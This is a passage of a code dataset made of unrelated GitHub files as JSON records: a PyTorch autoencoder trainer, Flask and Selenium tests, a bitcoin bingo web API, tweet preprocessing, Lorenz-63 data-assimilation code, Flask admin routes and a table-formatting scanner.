'resnet18':\n model = ResNetCustom(num_classes=config.sampling.num_class,\n latent_dim=config.autoencoder.latent_dim,\n gray=config.autoencoder.gray)\n\n else:\n console.quit(\"Please select correct parameter for architecture_type\")\n\n # Loss criterion and optimizer\n if config.autoencoder.loss == 'cross_entropy':\n criterion = nn.CrossEntropyLoss()\n elif config.autoencoder.loss == 'cross_entropy_weight':\n class_weights_tensor = class_weights_tensor.to(device)\n criterion = WeightedCrossEntropyLoss(weight=class_weights_tensor)\n elif config.autoencoder.loss == 'focal':\n criterion = FocalLoss(alpha=1, gamma=2)\n elif config.autoencoder.loss == 'mse':\n criterion = nn.MSELoss()\n\n # Calculate the number of parameters in millions\n num_params = count_parameters(model) / 1_000_000\n console.info(f\"The model has approximately {num_params:.2f} million parameters.\")\n\n model.to(device)\n\n # test memory usage\n console.info(memory_usage(config, model, device))\n\n # Loss criterion and optimizer\n optimizer = optim.Adam(model.parameters(), lr=config.autoencoder.learning_rate)\n\n loss_values = []\n\n # Training loop\n for epoch in range(config.autoencoder.num_epoch):\n model.train()\n running_loss = 0.0\n\n for images, labels, _ in train_loader:\n images, labels = images.to(device), labels.to(device)\n\n if config.autoencoder.architecture_type == 'conv_autoencoder':\n labels = images\n\n optimizer.zero_grad()\n outputs, _ = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n average_loss = running_loss / len(train_loader)\n loss_values.append(average_loss)\n console.info(f\"Epoch [{epoch + 1}/{config.autoencoder.num_epoch}] - Loss: {average_loss:.4f}\")\n\n # save intermediate weight\n if (epoch + 1) % config.autoencoder.save_model_every_n_epoch == 0:\n # Save the model weights\n saved_weights = f'model_weights_epoch_{epoch + 1}.pth'\n saved_weights_file = training_path / saved_weights\n\n console.info(f\"Model weights saved to {saved_weights_file}\")\n torch.save(model.state_dict(), saved_weights_file)\n\n # Create a plot of the loss values\n plot_loss(loss_values, num_epoch=config.autoencoder.num_epoch, training_path=config.training_path)\n\n # Save the model's state dictionary to a file\n saved_weights = \"model_weights_final.pth\"\n saved_weights_file = training_path / saved_weights\n\n torch.save(model.state_dict(), saved_weights_file)\n\n console.info(f\"Final model weights saved to {saved_weights_file}\")\n\n\n\n\n\n","repo_name":"Mojtabamsd/PlanktonFusion","sub_path":"feature_extraction/train_autoencoder.py","file_name":"train_autoencoder.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36628399225","text":"\"Test the about API endpoints.\"\n\nimport http.client\n\nimport base\n\n\nclass About(base.Base):\n \"Test the about API endpoint.\"\n\n def test_software(self):\n \"Get software API JSON.\"\n url = f\"{base.SETTINGS['ROOT_URL']}/about/software\"\n response = self.GET(url)\n self.check_schema(response)\n\n\nif __name__ == '__main__':\n base.run()\n","repo_name":"pekrau/webapp-flask-sqlite3-template","sub_path":"test/test_about.py","file_name":"test_about.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"4956387648","text":"'''\"浏览商品浏览\n所有商品\"\t汪里\n'''\n# 导入模块\nfrom page.goods_view import GoodView, url\nfrom common.base import open_browser\n\nimport unittest, time\n\n# 定义浏览商品测试用例类\nclass TestGoodsView(unittest.TestCase):\n # 编写test fixture\n def setUp(self) -> None:\n # 用户前置条件\n # 打开浏览器\n driver = open_browser('firefox')\n # 浏览商品类实例化\n self.goodsview = GoodView(driver)\n # 输入网址\n self.goodsview.open_url(url)\n\n def tearDown(self) -> None:\n # 关闭浏览器\n time.sleep(4)\n self.goodsview.close()\n \n # 编写test case\n def test_view(self):\n '''浏览商品测试用例:浏览所有商品'''\n self.goodsview.view_all()\n\n\n# 测试代码\nif __name__ == '__main__':\n unittest.main()","repo_name":"tianchuntian/beauty_shop","sub_path":"script/test_c_goods_view.py","file_name":"test_c_goods_view.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30880501193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jorge Niedbalski R. '\n\nfrom bitbingo.common.app import app\nfrom bitbingo.common.model import (Game,\n Player,\n Deposit,\n Token)\n\nfrom flask.ext.login import (login_required, current_user, login_user,\n logout_user)\nfrom flask.ext.restful import (Resource, Api, marshal_with, fields,\n marshal_with,\n marshal, abort)\nfrom flask.ext.restful import reqparse\n\nimport re\nimport json\nimport requests\nimport urllib\n\n\napi = Api(app, prefix=\"/api/v1\")\n\n\n#TODO: move this to a helper class\ndef marshal_and_count(n, r, f=None, **other):\n if not isinstance(r, list):\n r = [r]\n\n if f:\n r = map(lambda q: marshal(q, f), r)\n\n d = dict({'count': len(r), '%s' % n: r})\n for k, v in other.items():\n d.update({k: v})\n return d\n\n\nclass FieldValueError(ValueError):\n\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n ValueError.__init__(self)\n\n def __str__(self):\n return json.dumps({\n 'field': self.name,\n 'value': self.value\n })\n\n\ndef wallet_is_valid(value, name, *args):\n wallet_regex = '^[13][1-9A-HJ-NP-Za-km-z]{26,33}'\n\n if not re.match(wallet_regex, value):\n raise FieldValueError(name,\n \"Bitcoin wallet format is incorrect\")\n\n if Player.select().where(Player.wallet == value).count() > 0:\n raise FieldValueError(name,\n \"Bitcoin wallet already is used by another user\")\n return value\n\n\nclass AuthResource(Resource):\n player_fields = {\n 'id': fields.Integer,\n 'created': fields.DateTime,\n 'wallet': fields.String,\n 'balance': fields.Float\n }\n\n @marshal_with(player_fields)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"wallet\",\n type=str,\n required=True)\n parser.add_argument(\"password\",\n type=str,\n required=True)\n\n args = parser.parse_args()\n try:\n player = Player.login(args.get('wallet'), args.get('password'))\n except:\n return abort(404, message=\"Invalid provided credentials\")\n\n login_user(player, remember=True)\n return player\n\n\nclass DepositResource(Resource):\n deposit_to_fields = {\n 'ready': fields.String(attribute='paid'),\n 'amount': fields.Float,\n 'address': fields.String(attribute=\"input_address\")\n }\n\n def generate_wallet(self, token):\n parameters = {\n \"method\": \"create\",\n \"address\": app.config.get(\"WALLET_ADDRESS\"),\n \"callback\": \"http://bitbi.io/api/v1/deposit?token=%s\" % token.value\n }\n\n result = requests.get(\n \"https://blockchain.info/api/receive?%s\" %\n urllib.urlencode(parameters))\n\n if not result.status_code in (200, ):\n raise Exception('Invalid response code %s' % result.status_code)\n\n return result.json()\n\n @login_required\n @marshal_with(deposit_to_fields)\n def post(self, *args, **kwargs):\n parser = reqparse.RequestParser()\n parser.add_argument(\"amount\",\n type=str,\n required=True)\n args = parser.parse_args()\n\n deposit = Deposit()\n deposit.amount = args.get('amount', 0.0)\n deposit.token = Token.random()\n deposit.player = current_user.id\n\n wallet = self.generate_wallet(deposit.token)\n\n deposit.fee_percent = wallet.get('fee_percent', 0.0)\n deposit.input_address = wallet.get('input_address')\n\n deposit.save()\n return deposit\n\n\nclass PlayerResource(Resource):\n player_fields = {\n 'id': fields.Integer,\n 'created': fields.DateTime,\n 'wallet': fields.String,\n 'balance': fields.Float\n }\n\n @marshal_with(player_fields)\n def get(self):\n if not current_user.is_authenticated():\n return app.login_manager.unauthorized()\n return current_user\n\n def delete(self):\n if not current_user.is_authenticated():\n return abort(404, \"Player is not logged in\")\n logout_user()\n return \"User logged out\"\n\n @marshal_with(player_fields)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"wallet\",\n type=wallet_is_valid,\n required=True)\n\n parser.add_argument(\"password\",\n type=str,\n required=True)\n\n parser.add_argument(\"confirmation\",\n type=str,\n required=True)\n\n parser.add_argument(\"email\",\n type=str,\n default=None,\n required=False)\n\n args = parser.parse_args()\n\n player = Player()\n player.wallet = args.get('wallet')\n player.set_password(args.get('password'))\n\n player.email = args.get('email')\n player.active = True\n\n player.save()\n login_user(player, remember=True)\n\n return player\n\n\nclass ResultsResource(Resource):\n\n #TODO: move this to a fields class\n results_fields = {\n 'id': fields.Integer,\n 'random': fields.Float,\n 'created': fields.DateTime,\n 'scheduled_at': fields.DateTime,\n 'winner': fields.String,\n 'amount': fields.Float,\n 'players': fields.Float\n }\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"limit\", type=int, default=0)\n args = parser.parse_args()\n\n bets = [bet for bet in Game.get_recent_bets(\n limit=args.get(\"limit\", 0))]\n\n return marshal_and_count('results',\n bets,\n f=self.results_fields)\n\napi.add_resource(ResultsResource, '/result')\napi.add_resource(PlayerResource, '/player')\napi.add_resource(DepositResource, '/deposit')\napi.add_resource(AuthResource, '/player/login',\n methods=['POST', 'DELETE'])\n","repo_name":"niedbalski/bitbingo","sub_path":"bitbingo/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29098290118","text":"import nltk\nimport string\nfrom utility import constants, toggles\n\n\npunctuation_set = set(string.punctuation)\nstopwords_set = set(nltk.corpus.stopwords.words('english'))\nstemmer = nltk.stem.snowball.SnowballStemmer('english')\ntwitter_tokenizer = nltk.tokenize.TweetTokenizer(reduce_len=3)\n\nif toggles['stopwords_ignore_negation']:\n for w in constants['stopwords_negation']:\n stopwords_set.remove(w)\nstopwords_set.add('RT')\n\n\ndef process_tweet(json_data):\n \"\"\"Returns a dictionary with two keys `stemmed` and `user.\n\n `stemmed` contains the text to be processed upon.\n `user` contains the user data of the tweet owner.\n \"\"\"\n text = json_data.get('text')\n\n # Strip URLs.\n for url in json_data.get('entities').get('urls', []):\n text = text.replace(url.get('url', ''), 'http')\n\n # Tokenize text.\n tokens = twitter_tokenizer.tokenize(text)\n\n # Remove punctuation and stopwords.\n tokens = [x for x in tokens if x not in punctuation_set and x not in stopwords_set]\n\n # Stem the tokens.\n if toggles['stem_tokens']:\n tokens = [stemmer.stem(x) for x in tokens]\n\n result = {}\n result['stemmed'] = tokens\n result['user'] = json_data.get('user')\n\n return result\n","repo_name":"seokhoonlee/stock-analysis-tool","sub_path":"app/sentiment_analysis/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29911541677","text":"\ndef tic_tac_toe(bd):\n d = {'X':'1', 'O':'2'}\n lor = []\n for row in bd:\n lor.append(row)\n tbd = map(list, zip(*bd))\n for row in tbd:\n lor.append(row)\n lor.append([bd[0][0], bd[1][1], bd[2][2]])\n lor.append([bd[0][2], bd[1][1], bd[2][0]])\n \n for row in lor:\n if row[0] == row[1] == row[2]:\n return 'Player ' + d[row[0]] + ' wins'\n return \"It's a Tie\"\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"5Q2RRBNJ8KcjCkPwP_23.py","file_name":"5Q2RRBNJ8KcjCkPwP_23.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8147787419","text":"#%%\n#!/usr/bin/env python\n# coding: utf-8\n\n# Inicializacion. Cargamos los modulos necesarios\n\n\n#Importamos todos los modulos que van a ser usados en esta notebook\nfrom tqdm import tqdm\n\nimport numpy as np\nimport Lorenz_63 as model\nimport Lorenz_63_DA as da\n\nimport sys\nsys.path.append(\"../Lorenz_96/data_assimilation/\")\nfrom da import common_pf as pf\n\n\n#Seleccionar aqui el operador de las observaciones que se desea usar.\nfrom Lorenz_63_ObsOperator import forward_operator_onlyx as forward_operator\nfrom Lorenz_63_ObsOperator import forward_operator_onlyx_tl as forward_operator_tl\n\nnp.random.seed(10)\n\n#------------------------------------------------------------\n# Especificamos los parametros que usara el modelo\n#------------------------------------------------------------\na = 10.0 # standard L63 10.0 \nr = 28.0 # standard L63 28.0\nb = 8.0/3.0 # standard L63 8.0/3.0\n\np=np.array([a,r,b])\ndt=0.01 # Paso de tiempo para la integracion del modelo de Lorenz\nx0=np.array([ 8.0 , 0.0 , 30.0 ]) # Condiciones iniciales para el spin-up del nature run (no cambiar)\nnumtrans=600 # Tiempo de spin-up para generar el nature run (no cambiar)\n\n#------------------------------------------------------------\n# Configuracion del sistema de asimilacion\n#------------------------------------------------------------\ndx0 = 1.0*np.array([ 5.0 , 5.0 , 5.0 ]) # Error inicial de la estimacion. \nR0=8.0 # Varianza del error de las observaciones.\nnvars=3\nEnsSize=30 #Numero de miembros en el ensamble.\n\nnobs=np.size(forward_operator(np.array([0,0,0])))\n\n#Definimos una matriz de error de las observaciones\nR=R0*np.identity(nobs) #En esta formulacion asumimos que los errores \n #en diferentes observaciones son todos iguales y \nP0=10.0*np.array([[0.6 , 0.5 , 0.0 ],[0.5 , 0.6 , 0.0 ],[0.0 , 0.0 , 1.0 ]])\n\nlam = 40.0\n\nx=np.copy(x0)\nfor i in range(numtrans) :\n x = model.forward_model( x , p , dt )\n \n# Integramos la simulacion verdad\n# El resultado es almacenado en un array de numpy \"state\" con dimension (numstep,3)\n\nyo = forward_operator( x ) + np.random.multivariate_normal(np.array([0]),R)\n\n#Inicializamos el ciclo desde la media \"climatologica\" del sistema. Es decir no tenemos informacion precisa\n#de donde esta el sistema al tiempo inicial.\n\nstatefens=np.zeros((nvars,EnsSize))\n\nfor iens in range( EnsSize ) :\n statefens[:,iens] = np.nanmean( x , 0 ) + dx0 + np.random.multivariate_normal(np.zeros(nvars),P0)\n \n\n#Calculamos la matriz de transporte opitmo.\n#from emd import emd\nfrom scipy.spatial.distance import cdist\nimport ot\n \n \n \n#Calculo la inversa de la matriz de covarianza \nRinv = np.linalg.inv(R)\n \n#Calculamos los pesos en base al likelihood de las observaciones \n#dada cada una de las particulas.\nw=np.zeros( EnsSize )\nfor iens in range( EnsSize ) :\n yf = forward_operator( statefens[:,iens] )\n w[iens] = np.exp( -0.5 * np.matmul( (yo-yf).transpose() , np.matmul( Rinv , yo - yf ) ) )\n\n#Normalizamos los pesos para que sumen 1.\nw = w / np.sum(w)\n \n\n \n#Compute the weights as in the fortran routine\nw2=np.zeros(EnsSize)\nfor iens in range(EnsSize) :\n yf = forward_operator( statefens[:,iens] )\n w2[iens]=w2[iens] - 0.5*( (yo-yf)**2 ) * Rinv \n\n \n #Normalize log of the weigths (to avoid underflow issues)\nlog_w_sum = da.log_sum_vec(w2)\n\nfor iens in range(EnsSize) :\n\n w2[iens] = np.exp( w2[iens] - log_w_sum )\n #w2[iens] = np.exp(w2[iens])\n\n#Normalizamos los pesos para que sumen 1.\nw2 = w2 / np.sum(w2)\n\nimport matplotlib.pyplot as plt\nplt.plot(w2);plt.plot(w)\n\n\n\n\n\n\n","repo_name":"gustfrontar/DABA","sub_path":"Lorenz_63/test_w_computation.py","file_name":"test_w_computation.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"38936392242","text":"# Displaying .jpg Image using labels\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\n\nroot = Tk()\nroot.geometry(\"1024x612\")\nroot.resizable(0, 0) # Fix the size\n\nimage = Image.open(\"A:\\\\Python GUI Development\\\\Python Tkinter\\\\Required Images\\\\1.jpg\")\nphoto = ImageTk.PhotoImage(image)\n\nMylabel = Label(image=photo)\nMylabel.pack()\n\nroot.mainloop()\n\n","repo_name":"HARIOM317/Programing-languages-and-source-code","sub_path":"Development/Python GUI Development/Python Tkinter/5_ Label (Display .jpg image).py","file_name":"5_ Label (Display .jpg image).py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11387900487","text":"# coding: utf-8\nfrom flask import render_template, request, redirect, url_for\nfrom optico import app, db, images\nfrom optico.models import Mtype, Stype\nfrom optico.utils import check_admin\n\n\n@app.route('/mtype/')\ndef mtype(mtype_id):\n \"\"\"Page: main product type\"\"\"\n mt = Mtype.query.get_or_404(mtype_id)\n ps = Mtype.query.order_by(Mtype.show_order).all()\n return render_template('type/mtype.html', mt=mt, ps=ps)\n\n\n@app.route('/mtype/add', methods=['GET', 'POST'])\ndef add_mtype():\n \"\"\"Page: add main product type\"\"\"\n check_admin()\n if request.method == 'GET':\n return render_template('type/add_mtype.html')\n elif request.method == 'POST':\n # Save image\n max_id = db.session.query(db.func.max(Mtype.id).label('max_id')).one().max_id\n filename = images.save(request.files['image'], name='m%s.' % str(max_id + 1))\n\n # Add mtype\n mtype = Mtype(name=request.form['name'], image=filename, show_order=request.form['order'])\n db.session.add(mtype)\n db.session.commit()\n return redirect(url_for('home'))\n\n\n@app.route('/maintype/edit/', methods=['GET', 'POST'])\ndef edit_mtype(mtype_id):\n \"\"\"Page: edit main product type\"\"\"\n check_admin()\n mt = Mtype.query.get_or_404(mtype_id)\n if request.method == 'GET':\n return render_template('type/edit_mtype.html', mt=mt)\n else:\n # Delete old image\n # TODO\n\n # Save new image\n image = request.files['image']\n if image.filename:\n filename = images.save(image, name='m%s.' % str(mtype_id))\n mt.image = filename\n\n # Update mtype\n mt.name = request.form['name']\n mt.show_order = request.form['show_order']\n db.session.add(mt)\n db.session.commit()\n return redirect(url_for('home'))\n\n\n@app.route('/mtype//delete')\ndef delete_mtype(mtype_id):\n \"\"\"Proc: delete main product type\"\"\"\n check_admin()\n\n # Try to delete img file\n # TODO\n\n mtype = Mtype.query.get_or_404(mtype_id)\n db.session.delete(mtype)\n db.session.commit()\n return redirect(url_for('home'))\n\n\n@app.route('/stype/')\ndef stype(stype_id):\n \"\"\"Page: sub product type\"\"\"\n st = Stype.query.get_or_404(stype_id)\n ps = Mtype.query.order_by(Mtype.show_order).all()\n return render_template('type/stype.html', st=st, ps=ps)\n\n\n@app.route('/stype/add', methods=['GET', 'POST'])\ndef add_stype():\n \"\"\"Page: add sub product type\"\"\"\n check_admin()\n if request.method == 'GET':\n mtypes = Mtype.query.order_by(Mtype.show_order).all()\n return render_template('type/add_stype.html', mtypes=mtypes)\n elif request.method == 'POST':\n stype = Stype(mtype_id=request.form['mtype_id'], name=request.form['name'], show_order=request.form['show_order'])\n db.session.add(stype)\n db.session.commit()\n return redirect(url_for('stype', stype_id=stype.id))\n\n\n@app.route('/stype//edit', methods=['GET', 'POST'])\ndef edit_stype(stype_id):\n \"\"\"Page: edit sub product type\"\"\"\n check_admin()\n st = Stype.query.get_or_404(stype_id)\n if request.method == 'GET':\n mtypes = Mtype.query.order_by(Mtype.show_order).all()\n return render_template('type/edit_stype.html', st=st, mtypes=mtypes)\n elif request.method == 'POST':\n st.mtype_id = request.form['mtype_id']\n st.name = request.form['name']\n st.show_order = request.form['show_order']\n db.session.add(st)\n db.session.commit()\n return redirect(url_for('stype', stype_id=stype_id))\n\n\n@app.route('/subtype/delete/')\ndef delete_stype(stype_id):\n \"\"\"Proc: delete sub product type\"\"\"\n check_admin()\n stype = Stype.query.get_or_404(stype_id)\n db.session.delete(stype)\n db.session.commit()\n return redirect(url_for('home'))","repo_name":"hustlzp/optico","sub_path":"optico/controllers/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"6024766770","text":"import collections\nimport fnmatch\nfrom typing import List, Tuple, Optional\n\nimport monotable.plugin\nimport monotable.alignment\n\nMonoTableConfig = collections.namedtuple('MonoTableConfig',\n ['align_spec_chars',\n 'sep',\n 'format_func',\n 'format_func_map',\n 'option_spec_delimiters'\n ]\n )\n\"\"\"Copy of selected MonoTable instance and class variables.\"\"\"\n\n\nclass FormatScanner:\n \"\"\"Scans a format string for align, format_spec, and format directives.\n\n The format string takes the form [align_spec][directives][format_spec].\n See formats description in MonoTable.__init().\n\n The option_spec may select a format function and may select other options.\n\n The format functions in monotable.plugin.format_functions\n are selectable using an option_spec in addition to any supplied by\n format_func_map.\n\n An example usage:\n\n >>> import monotable\n >>> def my_format_func(value, format_spec):\n ... pass\n\n >>> align_spec = '<'\n >>> directives = '(width=17;wrap;sep= | ;my_format)'\n >>> format_spec = '.0f'\n >>> format_str = align_spec + directives + format_spec\n >>> config = monotable.scanner.MonoTableConfig(\n ... align_spec_chars='<^>',\n ... sep=' ',\n ... format_func=format, # \n ... format_func_map= {'my_format': my_format_func},\n ... option_spec_delimiters='(;)')\n\n >>> formatobj = monotable.scanner.FormatScanner(format_str, config)\n\n # formatobj has these attributes:\n >>> assert formatobj.error_text == '' # indicates no scanning errors\n\n # enumeration value for '<'\n >>> assert formatobj.align == monotable.alignment.LEFT\n\n # overrides config.format_func\n >>> assert formatobj.format_func == my_format_func\n >>> assert formatobj.format_spec == '.0f'\n >>> assert formatobj.width == 17\n >>> assert formatobj.fixed is False\n >>> assert formatobj.wrap is True\n >>> assert formatobj.sep == ' | ' # overrides config.sep\n\n Instance variables for user read access:\n\n error_text\n Describes what was wrong with option_format_spec.\n Empty sting indicates a good option_format_spec.\n\n align\n Value scanned from [align_spec]. It is one of _LEFT,\n _CENTER, _RIGHT, or _NOT_SPECIFIED.\n\n format_func\n Function with signature of .\n Reference to a format function associated with a\n scanned option-name or a default value.\n\n format_spec\n format_spec part of format_str.\n\n width\n Specifies the maximum number of horizontal columns of the\n formatted text.\n\n fixed\n When True, indicates the formatted text is exactly width columns.\n\n wrap\n When True, indicates the formatted text is text wrapped.\n\n sep\n Specifies separator string to be placed after the formatted\n text.\n\n none\n Specifies the formatted text for None cell value.\n\n zero\n Specifies the string to replace numbers that format to\n all digits of 0.\n\n parentheses\n When formatted text starts with '-', enclose in parentheses.\n \"\"\"\n\n def __init__(self, format_str: str, config: MonoTableConfig) -> None:\n \"\"\"\n Scan the string per delimiters, return results as instance vars.\n\n format_str\n String: [align_spec][directives][format_spec]\n See formats description in MonoTable.__init__().\n\n config\n Instance of MonoTableConfig that contains copies of a subset\n of MonoTable instance and class variables. See MonoTable\n doc string for detailed descriptions.\n align_spec_chars\n sep\n format_func\n format_func_map\n option_spec_delimiters\n \"\"\"\n\n # A design choice was made to keep all the format string\n # and format option handling in a separate class. This was done\n # to reduce the size of MonoTable class. The downside is that\n # the functions in this class need several MonoTable class and\n # instance variables. A copy of these variables are passed\n # here by parameter 'config' of type MonoTableConfig.\n # The design choice not taken was to move the\n # FormatScanner member functions into MonoTable.\n\n # renames to shorten long lines\n align_spec_chars = config.align_spec_chars\n\n # Since v2.1.0 formatting options are called format directives.\n # The option_spec_* variable names below refer to format\n # directives.\n\n option_spec_delimiters = config.option_spec_delimiters\n\n # Verify that the start delimiter of option_spec_delimiters cannot\n # be mis-interpreted as one of the align_spec_chars.\n # Do test here after instance is created to allow overriding the\n # class variables on an instance. For example:\n # mt = MonoTable()\n # mt.align_spec_chars = 'lcr'\n if align_spec_chars and option_spec_delimiters:\n t = option_spec_delimiters[0]\n assert t not in align_spec_chars, 'ambiguous'\n\n if option_spec_delimiters:\n d = option_spec_delimiters\n assert len(d) == 3, 'one for start, between, end'\n\n # start char and end char can be the same.\n # between char must be unique.\n assert d[0] != d[1], 'between char different than start char'\n assert d[1] != d[2], 'between char different than end char'\n\n # Combine hard coded format function options with user supplied\n # format functions. Note that a user name will hide a hard coded\n # name.\n self._format_functions = dict()\n self._format_functions.update(monotable.plugin.format_functions)\n if config.format_func_map is not None:\n self._format_functions.update(config.format_func_map)\n\n self.error_text = ''\n # if an arg is expected and there is no default value, set to None,\n self.width = None # type: Optional[int]\n self.fixed = False\n self.wrap = False\n self.lsep = None\n self.rsep = None\n self.sep = config.sep\n self.zero = None\n self.none = None\n self.parentheses = False\n self.format_func = config.format_func\n\n self.align, option_format_spec = monotable.alignment.split_up(\n format_str, align_spec_chars)\n if not option_spec_delimiters:\n # no delimiters disables option_spec scanning\n self.format_spec = option_format_spec # type: str\n return\n\n self._start, self._between, self._end = option_spec_delimiters\n option_spec, self.format_spec = (\n self._parse(option_format_spec))\n self._scan(option_spec)\n\n def _parse(self, option_format_spec: str) -> Tuple[str, str]:\n \"\"\"Split option_format_spec into option_spec and format_spec.\n\n option_format_spec\n [option_spec][format_spec]\n option_spec == (*) where * is 0 or more characters\n See directives description in MonoTable.__init__().\n\n Returns a tuple consisting of:\n The option_spec including the enclosing delimiters or empty string.\n The rest of the string after closing delimiter or entire string.\n Since v2.1.0 option_spec refers to format directives.\n \"\"\"\n\n startswith_match = self._start + '*' + self._end + '*'\n if fnmatch.fnmatchcase(option_format_spec, startswith_match):\n # look for self._end starting char after self._start\n option_spec_end = option_format_spec.find(self._end, 1)\n option_spec = option_format_spec[:option_spec_end + 1]\n format_spec = option_format_spec[option_spec_end + 1:]\n return option_spec, format_spec\n return '', option_format_spec\n\n def _scan(self, option_spec: str) -> None:\n \"\"\"Scan option_spec string for options and values.\n\n Updates instance variables align, error_text, format_func,\n format_spec, width, fixed, wrap, sep, zero, none, and parentheses\n per scan results.\n Since v2.1.0 option_spec refers to format directives.\n\n option_spec\n (*) where * is one or more option names separated by ;.\n See option_spec description in MonoTable.__init__().\n \"\"\"\n\n if not option_spec:\n return\n\n # assumes option_spec starts and ends with correct delimiters\n option_spec_copy_for_error_text = option_spec[:]\n option_spec = option_spec[1:-1] # drop start and end delimiters\n if not option_spec: # anything left to scan?\n return\n\n option_list = option_spec.split(self._between) # type: List[str]\n\n # scan for each option, process, and remove from option_list\n self._scan_int_arg('width', option_list)\n self._scan_no_arg('fixed', option_list)\n self._scan_no_arg('wrap', option_list)\n self._scan_str_arg('lsep', option_list)\n self._scan_str_arg('rsep', option_list)\n self._scan_str_arg('sep', option_list)\n self._scan_str_arg('none', option_list)\n self._scan_str_arg('zero', option_list)\n self._scan_no_arg('parentheses', option_list)\n\n self._scan_format_func(option_list)\n\n # silently ignore fixed or wrap options if no width=N option\n if self.width is None:\n self.wrap = False\n self.fixed = False\n\n # rsep is an alias for sep since version 2.1.0\n # unconditionally replace sep with rsep if rsep is specified.\n if self.rsep is not None:\n self.sep = self.rsep\n\n if len(option_list) > 0:\n # All the allowed option expressions have been removed from\n # option_list. So option_list contains only invalid values or\n # duplicates. Duplicates can be the same option or more than\n # one format function name. Show them in the error message.\n error_messages = ['In option_spec \"{}\"'.format(\n option_spec_copy_for_error_text)]\n for opt in option_list:\n message = (' unrecognized option \"{}\",'\n ' bad/duplicate name or bad \"=value\".').format(opt)\n error_messages.append(message)\n error_messages.extend(self._allowed_options())\n self.error_text = '\\n'.join(error_messages)\n\n def _scan_no_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option, remove if found.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n if arg is None:\n setattr(self, option_name, True)\n option_list.remove(option)\n break\n\n def _scan_int_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option + int arg and remove.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n value = self._scan_gt_value(arg)\n if value is not None:\n setattr(self, option_name, value)\n option_list.remove(option)\n break\n\n def _scan_str_arg(self, option_name: str, option_list: List[str]) -> None:\n \"\"\"Scan option_list for option_name option + string arg and remove.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name == option_name:\n # Keep rest after '='. OK if empty string after '='.\n if arg is not None:\n setattr(self, option_name, arg)\n option_list.remove(option)\n break\n\n def _scan_format_func(self, option_list: List[str]) -> None:\n \"\"\"Scan option_list for a format function, remove if found.\"\"\"\n for option in option_list:\n name, arg = self._option_and_arg(option)\n if name is not None and name in self._format_functions:\n if arg is None:\n self.format_func = self._format_functions[name]\n option_list.remove(option)\n break\n\n @staticmethod\n def _option_and_arg(option: str) -> Tuple[Optional[str], Optional[str]]:\n \"\"\"Split up a format option to an option name and arg.\"\"\"\n split_option = option.split('=')\n if len(split_option) == 1:\n return split_option[0].strip(), None\n elif len(split_option) == 2:\n return split_option[0].strip(), split_option[1]\n else:\n return None, None\n\n @staticmethod\n def _scan_gt_value(text: Optional[str]) -> Optional[int]:\n \"\"\"\n Scan text for integer value N. Returns N if an int > 0, else None.\n\n text can be None. If so return None.\n \"\"\"\n if text is None:\n return None\n try:\n int_value = int(text)\n except ValueError:\n return None\n if int_value < 1:\n return None\n else:\n return int_value\n\n def _allowed_format_functions(self) -> List[str]:\n lines = []\n fmt = ' {} - {}.'\n for name in sorted(self._format_functions):\n lines.append(fmt.format(name, self._format_functions[name]))\n return lines\n\n def _allowed_options(self) -> List[str]:\n lines = ['Directives are enclosed by \"{}\" and \"{}\", '\n 'and are separated by \"{}\".'.format(\n self._start, self._end, self._between),\n 'For example: \"{}width=22{}sep= {}\"'.format(\n self._start, self._between, self._end),\n 'Case is significant. Whitespace is not significant except',\n 'after the \"=\" in \"sep =\". Allowed options are:',\n ' width=N - column width is at most N columns. N > 0.',\n ' fixed - column width is exactly width=N columns.',\n ' Use to qualify width=N option.',\n ' wrap - wrap/re-wrap to width=N.',\n ' Use to qualify width=N option.',\n ' lsep=ccc - characters after lsep= go to left of column.',\n ' rsep=ccc - characters after rsep= go to right of column.',\n ' none=ccc - None formats as the characters after none=.',\n ' zero=ccc - if all digits are zero replace with ccc.',\n ' parentheses if minus sign, enclose in parentheses.',\n ]\n lines.extend(self._allowed_format_functions())\n return lines\n","repo_name":"tmarktaylor/monotable","sub_path":"monotable/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":15247,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"16147277121","text":"import pickle\nimport numpy as np\nfrom scipy import sparse\nimport time\nimport pandas as pd\nfrom lightfm import LightFM\nimport flask\nimport 